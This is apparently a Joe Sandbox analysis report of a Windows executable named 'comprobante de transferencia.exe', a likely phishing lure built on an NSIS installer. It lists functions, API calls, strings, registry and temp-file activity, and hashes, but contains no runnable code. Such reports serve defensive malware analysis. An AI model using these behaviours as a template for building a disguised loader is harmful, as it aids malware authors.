Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1338831902
Opcode ID: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
Opcode Fuzzy Hash: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,?,?,00000031), ref: 004017CD

Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027

Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00403160), ref: 004051D4
Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll), ref: 004051E6
Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234

Strings

C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp, xrefs: 00401819, 00401837
Call, xrefs: 00401785, 0040178E, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll, xrefs: 0040182D, 00401849
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven, xrefs: 00401796

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp$C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call
API String ID: 1941528284-1309035676
Opcode ID: 002dd4f96bdd12a9be5d665e019e1aa7de7c915f3f58c6e3467a44ba116e215f
Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
Opcode Fuzzy Hash: 002dd4f96bdd12a9be5d665e019e1aa7de7c915f3f58c6e3467a44ba116e215f
Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405179 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00403160), ref: 004051D4
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll), ref: 004051E6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll, xrefs: 0040519A, 004051AA, 004051B0, 004051D3, 004051DF

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll
API String ID: 2531174081-2621151191
Opcode ID: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
Opcode Fuzzy Hash: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68

Uniqueness

Uniqueness Score: -1.00%

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1

Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405CE6

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00406384 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
wsprintfW.USER32 ref: 004063D6
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA

Strings

\, xrefs: 004063AC
%s%S.dll, xrefs: 004063D0
UXTHEME, xrefs: 0040638D

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403088
GetTickCount.KERNEL32 ref: 00403109
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403136
wsprintfW.USER32 ref: 00403149

Strings

... %d%%, xrefs: 00403143

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
Opcode Fuzzy Hash: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp
API String ID: 1356686001-2180064541
Opcode ID: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
Opcode Fuzzy Hash: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628

Uniqueness

Uniqueness Score: -1.00%

Function 00405C1E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405C3C
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00405C57

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C23
"C:\Users\user\Desktop\comprobante de transferencia.exe", xrefs: 00405C1E
nsa, xrefs: 00405C2B

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2639927570
Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
Opcode Fuzzy Hash: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Uniqueness

Uniqueness Score: -1.00%

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F11
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F32
RegCloseKey.ADVAPI32(?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F55

Strings

Call, xrefs: 00405EEA

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
Instruction ID: 1229758a71a34d9b3841ebc19c7c3eba7c9bd897b4c963cc492d8629085b1b1e
Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
Instruction Fuzzy Hash: B9011E3255020AEADF21CF55ED09EDB3BA9EF55350F004036F905D6160D335D964DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

